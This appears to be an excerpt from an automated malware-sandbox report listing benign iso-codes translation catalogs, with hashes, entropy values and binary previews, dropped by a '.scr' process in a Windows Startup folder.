                                                                                                    Preview:....................#...........H"......I"......U"......]"......e"......t"......|".......".......".......".......".......".......".......".......".......".......".......".......#.......#.......#......%#.......#......6#......>#......E#......K#......S#.. ...Z#......{#.......#.. ....#.......#.......#.......#.......#.......#.......$....../$......A$......J$......W$......_$......h$......q$......x$.......$.......$.......$.......$.......$.......$.......$.......$.......$..,....%......E%......M%..%...S%......y%.......%.......%.......%.......%.......%.......%.......%..%....%..,....%.."....&..*...B&......m&......u&......~&.......&.......&.......&.......&.......&.......&.......&.......&.......&.......&.......'..'...%'..$...M'......r'.......'.......'.......'.......'.......(.......(.......(.......(......%(......6(......F(......b(......h(......z(.......(.......(.......(.......(.......(.......(.......(.......(.......(.......(.......(.......(.......(.......(.......).......).......)..!...5)......W)......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 54 messages, Project-Id-Version: iso_3166-2 'Alabama'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2565
                                                                                                    Entropy (8bit):4.782073168393619
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:zNc4/bmClMmfhgiWl6D0UbeFhNbxgC0lY1UtdaMj5/Y/U3sKGqr6rZV0SGZJL:zhtlRfif6o99gO1UiMlY/CsKGY6FGZJL
                                                                                                    MD5:D1FAC687A94AAE6730FDA00371951CD6
                                                                                                    SHA1:92130BE1BCC8DCA7BB7B6C27215A755896CD1003
                                                                                                    SHA-256:31A00785941B797CA76DCFC9E3F893B1A130A8C8F7B283C856C57048C7BC3121
                                                                                                    SHA-512:3A674562B4CC08368565B1B3DB555CD2B51B7B08898884471470DCB5E7096ADB56851BC6C6DD42317B1569B710028A3D74AEDD1C248AD1234CB30B4D4C629679
                                                                                                    Malicious:false
                                                                                                    Preview:........6...........I...|.......................................................................................................................................%.......+.......4.......<.......A.......H.......Q.......[.......a.......f.......o.......y...............................................................................................................................%.......1.......8.......B...$...H.......m.......u.......~...........................E...........................................................&.......2.......:.......C.......N.......V.......`.......f.......p.......w.......~.......................................................................................................................................................+.......9.......Q.......W.......`.......i.......q...............................................................................................,...6...............'...........................#.......................................$...*...!.......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 31 messages, Project-Id-Version: iso_3166-3 'Britu Antarktikas Teritorijas'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2671
                                                                                                    Entropy (8bit):5.258607830500166
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:VADLD9YvGqIfdvqNuoUozOW5uFp68WGkHfAwCNxDrIs:qDLD9YyBoJdO6nLHfc1
                                                                                                    MD5:B2E8669BE96F598526BFC39FE87B1D57
                                                                                                    SHA1:6C4C3ED10D0C8D6795CFDA75FB664F9457E91F5E
                                                                                                    SHA-256:15FF7DEC409E481941E60CD144150D873D1A1F42C83AC8D4BBBD5A8D89240FB0
                                                                                                    SHA-512:9EC03DF46DF6176BDE392EEFCD7B0A301E3F230D800A728AD22A12B41B32B11BE13D4E12BA2C0BFB1D91748D00F6882042F5B30BBB28A26BE57483107530AEAB
                                                                                                    Malicious:false
                                                                                                    Preview:....................).......................).......*...........".../...?.......o.......w...........................)...........................!.......1.......@.......U.......b...!...o................................... .......)............... ...6.......W...2...c.................................../...............2...........0.......9.......O.......]..."...t...+.......!...........................................2.......A.......S.......h.......}...................#.......1..............."...........5...'...A.......i........................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern and Antarctic Territori
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 142 messages, Project-Id-Version: iso_4217 'Afg\304\201ns'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):7313
                                                                                                    Entropy (8bit):4.936608681028899
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:ffXUSiqyeGGGb5E09Sg8pCuSyzZIG8ldS3kwKmFzGA795Y8nGsPrEkv:Hniqyeh4N8PCVOkKkC93nZQkv
                                                                                                    MD5:2FB3417E7940A35584045B36CE9FB088
                                                                                                    SHA1:01E83280A73E10A6C9B4E3C33228F47A205F0643
                                                                                                    SHA-256:009F2E7D5B4DFB3E0CD03B58585312056331C2B580723F10201C4DCBC8B1124D
                                                                                                    SHA-512:5B12598CEA09233CC1292BCE017F242AF46790E8373069E7342F0B97E82B226CE3A82F231078E8682A9C0539255A4F0FB1D6EC20ECE88D37E1D90DAB5FAB6BF7
                                                                                                    Malicious:false
                                                                                                    Preview:........................................................................-.......?.......O.......^.......c.......j.......z...............................................................................................+.......8.......G.......W.......c.......u.......................................................................................................................2.......>.......E.......P.......`.......e.......l.......t.......................................................................................................................#.......2.......6.......>.......D.......T.......a.......k.......p...............................................................................................................7.......H.......X.......`.......o.......y...............................................................................................................................!.......-.......;.......L.......S.......d.......{.......................................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 255 messages, Project-Id-Version: iso_639-3 'A\304\215olu'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10625
                                                                                                    Entropy (8bit):4.836030414467302
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:VgmjZA1gOwTsSHhPtlYZU28rT9PFotftLzB5X5c1IadyY1yWbtAF9fO:Vg3gxBVlYZt8tFoBBN0qa0ObOFQ
                                                                                                    MD5:A3E2611A49C90FE77A668EB7A244C466
                                                                                                    SHA1:38E1EBFC7A2948FE3672B92D57674292A8DC8D6A
                                                                                                    SHA-256:390C2A8809D5FA48DED3AC4C9D8E706BF0713A5DD946D0A6B27EB7BE508077EA
                                                                                                    SHA-512:6038D06321590BA3295E918D7B0B0FD4F80301EE933098E764165EFD72DDA67C405D2307A324F41A70E0C1EB4DF7621E3AC04C712C3249AE41F7720AA26890A9
                                                                                                    Malicious:false
                                                                                                    Preview:....................[...........x.......y....................................................................................................................................................................... .......&...............3.......:.......D.......L.......R.......Z.......b.......k.......t.......}...............................................................................................................................................*.......0.......9.......>.......Q.......X.......`.......|.......................................................................................................................!.......'.......,...#...3.......W.......w.......}...............................................................................................................................................".......(...:...3.......n.......x...............................................................................................................................!.......-.......2.......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 73 messages, Project-Id-Version: iso_3166-1 '\340\244\205\340\244\253\340\244\227\340\244\276\340\244\250\340\244\277\340\244\270\340\245\215\340\244\244\340\244\276\340\244\250'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4535
                                                                                                    Entropy (8bit):4.994613408035811
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:5irx0gwhZxWzU9SIqFayNyzg/0Y8xdM1tcVENu9nMHUnnnEWvB:tgwX0zUQIcLNyIBntcmbYn/
                                                                                                    MD5:440E7FC859117D246B60270121D183E8
                                                                                                    SHA1:7938081D2B7E2A7A5CD16ACD34D71DA498007297
                                                                                                    SHA-256:437CCCC5BD6C769DC7D756B66563CCB3162E13849289610A03616FD191028894
                                                                                                    SHA-512:7869290FA72A7E6057978F1464948C41D84B409E45DFB4DE751014AC0D91A3F3E6BD9620995ED1D5A708328F42D6B90868A0F2162CE0FC9DD7267147AD510A7F
                                                                                                    Malicious:false
                                                                                                    Preview:........I.......d...a...........0.......1.......=.......E.......M.......a.......k.......s.......}...............................................................................................................................................................................-.......7.......?.......E.......O.......T.......[.......a.......g.......n.......u...............................................................................................................................................).......2.......9.......E.......L.......W.......`.......m.......u...........................................................!.......................2.......!.../.......Q...!...m...............................................................,.......B.......a.......}...............................................................*.......@.......S.......c...........................!..................................................."...$...2.......W.......m...........................................'...
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 107 messages, Project-Id-Version: iso_3166-1 '\320\220\321\204\320\263\320\260\320\275\320\270\321\201\321\202\320\260\320\275'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5636
                                                                                                    Entropy (8bit):5.032871436939297
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:4MP4F/Mr6pAWsOJeUKRUqB2rmuJ0MycIMUM6jSq0gfnKKTkcYGz+8fcZnz:LK2+JeUK6qsrmdA6jIgfKKTkdGzffAnz
                                                                                                    MD5:5193448A4D90A42158ED0B2E5196FEB3
                                                                                                    SHA1:B84B7F563AA54223BCDD538F871FDA25DF40387F
                                                                                                    SHA-256:395FE841B22268DB00EBB939C9FA57A91C95A2F1DC6609D605E3DE381E117167
                                                                                                    SHA-512:FAF23334DCA8397FC971F6FBE2D08B3B2066F92467AAFFBE8EDB9510CBD74CE7CF29503B04D4D2E5ACE8B6EA79E35F454011CE4BEF5C3B6C67D7448EAABBCEE7
                                                                                                    Malicious:false
                                                                                                    Preview:........k.......t............... .......!.......-.......5.......=.......E.......O.......W.......a.......i.......t.......}...............................................................................................................................................+.......3.......?.......G.......P.......X......._.......m.......u.......}...............................................................................................................................................................".......0.......:.......E.......N.......T.......[.......c.......j.......u.......................................................................................................................................&.......1.......;.......D.......M.......U.......[.......e.......n.......u...............................................................................................................................................#.......2.......E.......T.......g.......v.......................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 209 messages, Project-Id-Version: iso_3166-1 '\304\200whekenet\304\201na'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10467
                                                                                                    Entropy (8bit):4.959564439547539
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:B8sIARdL0V/TsnVJkj4oLvaaQ++vHFjzzEN430wpksMCmkWsePAZuLD:B89ARi7GMlDaN+qFj3EN43ppkhFHnAwf
                                                                                                    MD5:F9170B325BC3BFD895B578909A36FB89
                                                                                                    SHA1:BCF3627E40D2CDDC06D09F436FF25BDA1A4F0373
                                                                                                    SHA-256:FA6824F36A8FDC5DEDE6A564157965A0C34CDA2769C91E2917E8E594CA649D8C
                                                                                                    SHA-512:E54F7A37CAF811AE59DD9BDF677BF208F370263055029D258B0A3202F7C67589FF09A5ADFEA73557ABFAC9A4A7D79E9257ACAA8BD6581D3A70E2AE32ED9EC82E
                                                                                                    Malicious:false
                                                                                                    Preview:........................,...............................................................................................................................................2.......9.......B.......J.......S.......\.......c.......i.......o.......x.......~.......................................................................................................................$.......+.......9.......J.......Z.......`.......h.......p.......v...............................................................................................................................................................".......-.......3.......F.......Z.......m...............................................................................................................#.......).......4.......>.......E.......M.......T.......].......h.......p.......{...............................................................................................................................................1.......D.......X.......l.......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 1 message, Project-Id-Version: iso_3166-3
                                                                                                    Category:dropped
                                                                                                    Size (bytes):446
                                                                                                    Entropy (8bit):5.311276178357509
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:ilijs6YYxA9Ct0vOuvP0NXzff5Mv//RYhLOAFiGR9XmBQ8KMW0YEiONwN2BJl:i4nxxjt02Ukan/ydziIXmBQWiOWEl
                                                                                                    MD5:0DE27A5E7F9F54046B16CB4CB443FA55
                                                                                                    SHA1:005E4BAF0B7FB67310101821D6442EF6C5643280
                                                                                                    SHA-256:1BF40DA671EFC82B62021E508A8E82F7154F7E16EAE79B80E43B41264EE5727E
                                                                                                    SHA-512:C88AA7A9767B3849B9D0527217EA44C56D198E8CF84C0B238CCCA9D17C8E8C1D8047A64BEB747F1107A15B2C2FC0DF3845C9B7C08F4D8073A73B2FDF5E9872CF
                                                                                                    Malicious:false
                                                                                                    Preview:................$.......,.......8.......9................Project-Id-Version: iso_3166-3.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2013-07-10 19:04+0200.Last-Translator: Chris <cjl@laptop.org>.Language-Team: Sugar Labs.Language: mi.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit.Plural-Forms: nplurals=2; plural=(n != 1);.X-Generator: Pootle 2.0.5..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 29 messages, Project-Id-Version: iso_639-3 'Reo \304\200wherika Tatimana'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1619
                                                                                                    Entropy (8bit):4.826541028984427
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:rxxxnsSM//M4PkilI+Ch2/swB9GmuBJXrqinpupCyx1nVt0Us35wqRbXmeyTxmML:rX5M/E4nPCaBc2iGCWnMUoZMey4n2/
                                                                                                    MD5:5E42C5785A70AFCD0234207D36F29A9E
                                                                                                    SHA1:DEE0ECA0C497FF654B078FEB4005AB6157B98E9D
                                                                                                    SHA-256:03784F4AFB09C048C96A750C16FFE057AC2A7BFEC84EDE1C1EC53E13D12EA502
                                                                                                    SHA-512:42783B63CB90F82C921CF737572C52F739F8CDAFBB21D7772944C7C577EDB5411AA0D56FD4C7FFFEBD53DA5FA07DE4EEF3F7258903264FDDA4C3DCED15306E77
                                                                                                    Malicious:false
                                                                                                    Preview:....................)...................................................................................................................................................................!.......*.......5.......;.......B.......M.......V.......^.......f.......n...g...t.......................................#.......;.......F.......T.......a.......n.......y...............................................................................................................#.......-.......7.......C........................................................................................................................................................................Afrikaans.Arabic.Breton.Bulgarian.Catalan.Chinese.Croatian.Danish.Dutch.Estonian.Finnish.French.German.Hebrew.Hungarian.Icelandic.Irish.Italian.Japanese.Macedonian.Maori.Polish.Portuguese.Romanian.Russian.Spanish.Swedish.Tamil.Project-Id-Version: iso_639-3.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revi
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 402 messages, Project-Id-Version: iso_3166-1 '\320\220\320\262\320\263\320\260\320\275\320\270\321\201\321\202\320\260\320\275'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):27425
                                                                                                    Entropy (8bit):5.205544283914804
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:i6huU+MoZu3j+msOP4XJOAE/uWfe4MUwbn5YGa:i6toCjfFfe4MUwlM
                                                                                                    MD5:71A6FF579E1CA6DF5871862412A7EA1E
                                                                                                    SHA1:01868C2FA4A73ACF80BA739ACB6F594004D8B93B
                                                                                                    SHA-256:7FB6862E7E66766C8D1DB2D55303B522E0BB151432DB06AD21066AEE7952046D
                                                                                                    SHA-512:FB1C1C5D5D8A84AAB835AB8FD35540607E2913F90BE45C4C94CB35F2192829DABAE642F6AA7C789ABAE1066B5B9A7AAECE66875B55C224A0C6FD7F92F03579A5
                                                                                                    Malicious:false
                                                                                                    Preview:........................<........!.......!.......!.......!.......!.......!.......!.......!.......!.......!......."......*"......4"......G"......O"......U"......_"......g"......r"......z".......".......".......".......".......".......".......".......".. ....".......".......".. ....#......,#......C#......L#......Z#......a#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$.......$.......$......*$......B$......K$......d$..,....$.......$.......$..%....$.......$.......$.......$.......%.......%.......%.......%......%%..%...4%..,...Z%.."....%..*....%.......%.......%.......%.......%.......&.......&......&&......,&......8&......J&......R&......Z&......c&.......&..'....&..$....&.......&.......&.......'......1'......O'......T'......\'......c'......q'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......(.......(.......(...... (......+(......0(......:(......C(......J(......X(......_(......e(..!....(.......(.......(......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 31 messages, Project-Id-Version: iso_3166-3 '\320\221\321\200\320\270\321\202\320\260\320\275\321\201\320\272\320\260 \320\260\320\275\321\202\320\260\321\200\321\202\320\270\321\207\320\272\320\260 \321\202\320\265\321\200\320\270\321\202\320\276\321\200\320\270\321\230\320\260'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3238
                                                                                                    Entropy (8bit):5.443019456358584
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:VADyg0vfvGqIfdvqNuoUVSbUwTRHbxafqZcrjVGSjNi8o02hgNnJ2:qD6HyBoD9Nt0Xpmzk2
                                                                                                    MD5:F29284C6DE7050D86EF96D94F541C530
                                                                                                    SHA1:CA2F6775478437BA5FCFC0B0AD8AEB26E4FAF2D7
                                                                                                    SHA-256:EC4001B661396EC02A6FC5888AEC276FD5E3D0381FFC2D9C38EA6D34F930286A
                                                                                                    SHA-512:5D3AC25C1850944E976C5E237A110425094F3C111244F67AFA9193320052D1850872B065EAD4C17761E1F86C5B817E481C9600D297A5010ADB92F73C1D72FF29
                                                                                                    Malicious:false
                                                                                                    Preview:....................).......................).......*...........".../...?.......o.......w...........................)...........................!.......1.......@.......U.......b...!...o................................... .......)............... ...6.......W...2...c...................<...2...S...o...\......."... ...b...C...........................*.......).......[...7...<.......-.......$...........#.......?......._.......{...G...............!...................$...=...@...Z...~...(.......8...........;...4...U................................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern and Antarctic Territori
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 40 messages, Project-Id-Version: iso_639-3 '\320\220\321\204\321\200\320\270\320\272\320\260\320\275\321\201\320\272\320\270'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2178
                                                                                                    Entropy (8bit):5.00850564327629
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:O7tudzng0RFsJs6c4s+0Ni7CPMUJzFHb5+Fj+1+Nu19X+/i1gWs1vTn1UFpKaxmi:Sk9g0R76c4m9PMkBEI/4b6
                                                                                                    MD5:A1C6510379B17D8915F4B3F3A4F227D7
                                                                                                    SHA1:E27F9B9354FB5E67403183A6B29D58BE730138CE
                                                                                                    SHA-256:43FC1D8C48961120FBE7F25A28D813962BFC8114FA17E152DA955056E3BBF6C0
                                                                                                    SHA-512:2727A990F2D6849703F1E9AE479C18268356D323354CB775D4501BA209DCDA9501F545027EC57DFC144C3787849CBE0B351A6FF8FA35898BA04C9766CD915323
                                                                                                    Malicious:false
                                                                                                    Preview:........(.......\...5...........p.......q.......{.......................................................................................................................................................................!.......(.......3.......>.......D.......K.......V......._.......g.......o.......v...................................................O...................................0.......C.......T.......i.......x.......................................................................................-.......@.......K.......b.......s...............................................................................................=.......L.......].......d.......q..................................."...............'... ...........#.......%.......&.......................(...................................................$...........................................!............Afrikaans.Arabic.Basque.Breton.Bulgarian.Catalan.Chinese.Croatian.Czech.Danish.Dutch.Esperanto.Estonian.Finnish.French.
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 18 messages, Project-Id-Version: iso_15924 '\340\264\205\340\264\261\340\264\254\340\264\277'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1295
                                                                                                    Entropy (8bit):5.203583069080035
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:tnlRTl1rGKP7cJWXzGUCVt0U3j6XmuvOcCtG1zPGOq:HRTl1rLP7rXzGUlUz3uVCtQLGOq
                                                                                                    MD5:16657D95A342B31250B46022676146E6
                                                                                                    SHA1:5915F5AC50CE898DE4CCA8FFABBB5649F5354E71
                                                                                                    SHA-256:DCFD8FCA81DC77D1308A4A9237A030EDC0002115D478D1395A4C1A7CBF499E6E
                                                                                                    SHA-512:1B073A64394ADCDC0540A895CC29D9E06CEEFD7FD2D1DF861E1A60E1A6A80540D1F91A5A2DD447728A6F9951B46DBDA73226778FCBBFD896D0A1C4EF8433E498
                                                                                                    Malicious:false
                                                                                                    Preview:........................<...............................................................................................................................!.......(...........c...5....................................................... .......3.......C......._.......r........................................................................................................................................................................Arabic.Bengali.Brahmi.Greek.Gujarati.Gurmukhi.Hebrew.Kannada.Latin.Malayalam.Mongolian.Oriya.Saurashtra.Sinhala.Syriac.Tamil.Telugu.Project-Id-Version: iso_15924.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2007-09-09 16:07+0200.Last-Translator: Tobias Quathamer <toddy@debian.org>.Language-Team: Malayalam.Language: .MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit.X-Generator: KBabel 1.11.4...............................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 390 messages, Project-Id-Version: iso_3166-1 '\340\264\205\340\264\253\340\265\215\340\264\227\340\264\276\340\264\250\340\264\277\340\264\270\340\265\215\340\264\244\340\264\276\340\264\250\340\265\215\342\200\215'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):34752
                                                                                                    Entropy (8bit):4.982292774488933
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:yOKr/Pi6OwxBrlQmsOP4YGCAjfUq51oOw:y3aHwpgUq51oOw
                                                                                                    MD5:FDF190F09B8727EE556A41F2EFC1FC68
                                                                                                    SHA1:8D551EF84AB3130068B13AF8D5E413259E3EBD76
                                                                                                    SHA-256:9A861EFD136838D2FA783266E0E56F86DCA4C69C1816D39F9132FAC95FBC96FB
                                                                                                    SHA-512:BE4379C8C5EE0C24826FA99ED5FC61BE872A7A0C88A8D9BD2F739146256E97082BB77910948AC6370F214D6CFEF8544C768703ED59C3A621AECEF749F12269B7
                                                                                                    Malicious:false
                                                                                                    Preview:................L.......|........ ....... ....... ....... ....... ....... ....... ....... ....... ....... .......!.......!......$!......7!......?!......E!......O!......W!......b!......j!......r!......}!.......!.......!.......!.......!.......!.......!.. ....!.......!.......!.......!.......!......."......."....../"......F"......X"......a"......n"......v".......".......".......".......".......".......".......".......".......".......".......".......#..,.../#......\#......d#..%...j#.......#.......#.......#.......#.......#.......#.......#..%....#..,....$.."...-$..*...P$......{$.......$.......$.......$.......$.......$.......$.......$.......$.......$.......$.......%.......%......%%..'...3%......[%......w%.......%.......%.......%.......%.......%.......%.......%.......&.......&....../&......5&......G&......N&......V&......^&......d&......n&.......&.......&.......&.......&.......&.......&.......&.......&.......&.......&.......&.......&..!....'......$'......6'......T'......]'..0...g'.......'......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 31 messages, Project-Id-Version: iso_3166-3 '\340\264\254\340\265\215\340\264\260\340\264\277\340\264\237\340\265\215\340\264\237\340\265\200\340\264\267\340\265\215 \340\264\205\340\264\250\340\265\215\340\264\261\340\264\276\340\264\260\340\265\215\342\200\215\340\264\237\340\265\215\340\264\237\340\264\277\340\264\225\340\265\215 \340\264\252\340\265\215\340\264\260\340\264\246\340\265\207\340\264\266\340\264\202'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4406
                                                                                                    Entropy (8bit):5.093476896300879
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:VADtXM5vGqIfdvqNuoUZiAopjk2gqha/kJMp9HYIxNPz5H:qDtXIyBorAo/D+jdH
                                                                                                    MD5:6BAC278DEC1B283380D42574E5EF818B
                                                                                                    SHA1:43CC5E7874EBB66AD1C967F8564453B576C3240D
                                                                                                    SHA-256:59D07A9D9961068200E40E43AE7499E2829F2997A352721F8D6E97D97D040783
                                                                                                    SHA-512:B8305F87A8AF194890B9BFCA265D19ADD89DBE0447878AE5D0BB7670FAACB9FA775FEB9A48445E95CE2B88A1F13A60EE14B19C36A41F5A70F11A6417C7A1E3B8
                                                                                                    Malicious:false
                                                                                                    Preview:....................).......................).......*...........".../...?.......o.......w...........................)...........................!.......1.......@.......U.......b...!...o................................... .......)............... ...6.......W...2...c..................._...+...Y..............._.......................A.......1.......M...#...J...q...........V...D...b.......F.......4...E...C...z...........+.......e......./.......O.......................`...D...........P...C...........(...".......K...1............................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern and Antarctic Territori
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 195 messages, Project-Id-Version: iso_3166-1 '\320\220\321\204\320\263\320\260\320\275\321\201\321\202\320\260\320\275'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10101
                                                                                                    Entropy (8bit):5.071872151310648
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:H2rublMYG/hRmvVbKTt4SqUaErjvLFUAYQaKjlnfeoUf7IRjUtISA3L2t:Wr0lGQbKTqjEPziNQaK140Rj2fA3St
                                                                                                    MD5:8C261E5461A21E73C90A12230B979516
                                                                                                    SHA1:E4D77355F5B534993C3402D6FD171C3E1689067B
                                                                                                    SHA-256:FF141496963FC7F856B5657C4FC1CCA2BAE6DB85538E10F95CD9DD54685726CF
                                                                                                    SHA-512:3D5AEAAF1720556489330DA3CA808E11136A6917EA4C9B382837F1B807685CD3FE271BBF1104FA9424865B79E4167DAB6BAF5187E16D4124785780014F82347B
                                                                                                    Malicious:false
                                                                                                    Preview:................4.......L.......h.......i.......u.......}.......................................................................................................................................................#.......+.......B.......K.......Y.......`.......................................................................................................................$.......*.......5.......=.......B.......I.......X.......`.......i.......|.......................................................................................................................................!.......+.......2.......<.......D.......I.......S.......Z.......a.......g.......p.......z...........................................................................................................&...........................$......./.......6.......>.......F.......L.......Z.......d.......o.......u...............................................................................................................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 1 message, Project-Id-Version: iso_3166-3
                                                                                                    Category:dropped
                                                                                                    Size (bytes):427
                                                                                                    Entropy (8bit):5.252149410829184
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:ilijEYYxA9Ct0vOuvP0NXzff8oq/R8ZIwU/2AF9yM1C3XmBQ8KMW0YEiR8c:i4Exxjt02Ukjq/+ZTG9fQ3XmBQWiR8c
                                                                                                    MD5:43928289D7BD16E813FA8B50A8D1D1DD
                                                                                                    SHA1:89BE1C8ED2E58882C50133284D6911E71EB6233D
                                                                                                    SHA-256:4F2AF6B1478E1F115EA82C42C8A60547C933FCC32C11FE51222A505DC11C78AC
                                                                                                    SHA-512:5B6A08191AA16614FBDBD4BB5C1C8A92E7652BE5C8DB5591286B4B9F9B1BBA73C889FB12BC96DAA510C9E84C8854A3545FA62DD44C07FF65691987B58FF41DBD
                                                                                                    Malicious:false
                                                                                                    Preview:................$.......,.......8...q...9................Project-Id-Version: iso_3166-3.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2003-02-12 21:40+0100.Last-Translator: Sanlig Badral <badral@chinggis.com>.Language-Team: Mongolian <mn@li.org>.Language: mn.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit.X-Generator: KBabel 0.9.6..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 82 messages, Project-Id-Version: iso_4217 '\320\220\321\204\320\263\320\260\320\275'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5207
                                                                                                    Entropy (8bit):5.196419929692369
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:fDQO+fWsoFlzyWtlRW4YEJMmSbTdXjGm4RbEVn9UsJ+x:VUqzFfXNdm1GVTse
                                                                                                    MD5:E20A0DB2CEED797DC1DC44CA6E62D92D
                                                                                                    SHA1:30CA7E51781F5002405085756B74DD363ED90425
                                                                                                    SHA-256:09D8654EB4259BFF5314BCEDE9DD4CC572C54D796C9CC79A30CAE2C8F682E019
                                                                                                    SHA-512:A9A8A655588BAC0D02137386623B20E31BF06850F0180C07708FA616E88B0D4EB3E04797306E8B8249EE41CCF09A0EDBFF52F19D0F76697014F230B3EDC10D0F
                                                                                                    Malicious:false
